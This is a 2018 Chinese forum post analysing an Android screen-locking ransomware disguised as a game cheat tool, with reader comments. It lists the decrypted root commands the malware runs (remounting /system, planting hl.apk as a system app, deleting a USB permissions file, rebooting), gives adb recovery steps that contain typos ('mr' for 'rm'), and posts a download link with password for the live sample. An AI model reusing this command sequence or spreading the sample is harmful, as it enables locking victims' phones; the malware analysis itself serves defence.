Android 锁机样本母体分析
本帖最后由 莫问刀 于 2018-8-17 09:49 编辑----------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------锁机母体分析-----------------------------------------------
----------------------------------------------------------------------------------------------------------------------------
背景:
最近安装了一个,吃鸡辅助软件,便宜以辅助需要root权限为理由,要我们给予软件root权限。我们当然是信了啊,不然怎么会被锁呢。。
结果:手机真的被锁了。
----------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------
就是这样,我当时打开软件,给了root权限,手机马上重启了。重启之后,马上就这样子。我看到重启的那一刻我就
觉得事情没有那么简单。emmmmmmm
怎么办,先把样本(刺激最强辅助拖进jadx)
---------------------------------------------------------------------------------------------------------------------------
在界面入口,做了文件是否存在的判断,但是,这个字符串做了加密。
进入 qtfreet00.decode 看看
这个明显就是解密工具了。我们把这个代码,直接复制到ide ,然后把需要解密的字符跑一跑
这个地方,root执行了很多命令,不知道做了啥子,
不管了。全部跑。接下来就是cv过程;
前面文件判断结果是:
/system/bin/su
/system/xbin/su
就是判断你这个手机,有没有root权限,如果给了root权限就做下面的事情了。
pm uninstall com.example.xphuluxia //卸载某个软件
www/app/emulated //在asset目录下有个emulated文件
/sdcard/emulated //这个是复制emulated文件到储存卡的目录
mount -o rw,remount /system //挂载
cp
/system/app/hl.apk
/system/priv-app/hl.apk
chmod 644 /system/app/hl.apk //复制上面的储存卡的目录emulated,到系统目录下改名字hl.apk给予权限
rm -f /system/etc/permissions/android.hardware.usb.accessory.xml//删除usb相关配置文件
reboot //重启手机
---------------------------------------------------------------------------------------------------------------------------
这就是我打开辅助软件,授予root权限之后,经历的东西
母体分析到此结束
---------------------------------------------------------------------------------------------------------------------------
我的手机怎么救回来的??
adb shell
su
mount -o rw,remount /system
cd /system/app
mr hl.apk
cd /system/priv-app
mr hl.apk
重启手机。完。
上面是删除了我的usb xx配置文件,但是我依然可以连接到我的手机。神奇了。。
(因为平时我用我的手机做开发的,我的电脑已经授予了权限debug,所以能连接上,不然一台陌生的电脑是无法连接到手机,并且可以连接adb的)
---------------------------------------------------------------------------------------------------------------------------
不要给什么辅助,gua等approot权限。现在锁机流氓很多。
不要给什么辅助,gua等approot权限。现在锁机流氓很多。
不要给什么辅助,gua等approot权限。现在锁机流氓很多。
母体样本:链接: https://pan.baidu.com/s/1u68KGktcXIeNJfRycilkhQ 密码: 6vwg
大家不要用真机玩,记得用模拟器
大家不要用真机玩,记得用模拟器
大家不要用真机玩,记得用模拟器
---------------------------------------------------------------------------------------------------------------------------
对于锁机子软件hl的分析,后面可能会发,如果有兴趣的就直接解压apk,然后在asset目录www。app下那个文件,就是apk了。
Hmily 发表于 2018-8-17 08:03
@qtfreet00 我擦,繁华你写的木马吗?
我在几个月前看到大佬分享的混淆工具,还收听了他。。。。。。。样本中代码有这个大佬名字,是不是有人估计抹黑 其实不用这么麻烦,下载一个叫锁屏敲诈木马专杀工具增强版,是腾讯哈勃分析系统里的工具,之前有大佬分享过的
话说楼主闲着没事干下这个东东(*^__^*) 嘻嘻{:1_918:} 可以的,谢谢分享 膜拜大佬
厉害厉害! 学习了哈哈哈 遇到大神了 首先得懂java 只学过Python的我 厉害啊大兄弟!!!遇到大神 (反正我啥也不懂) 不懂java 的我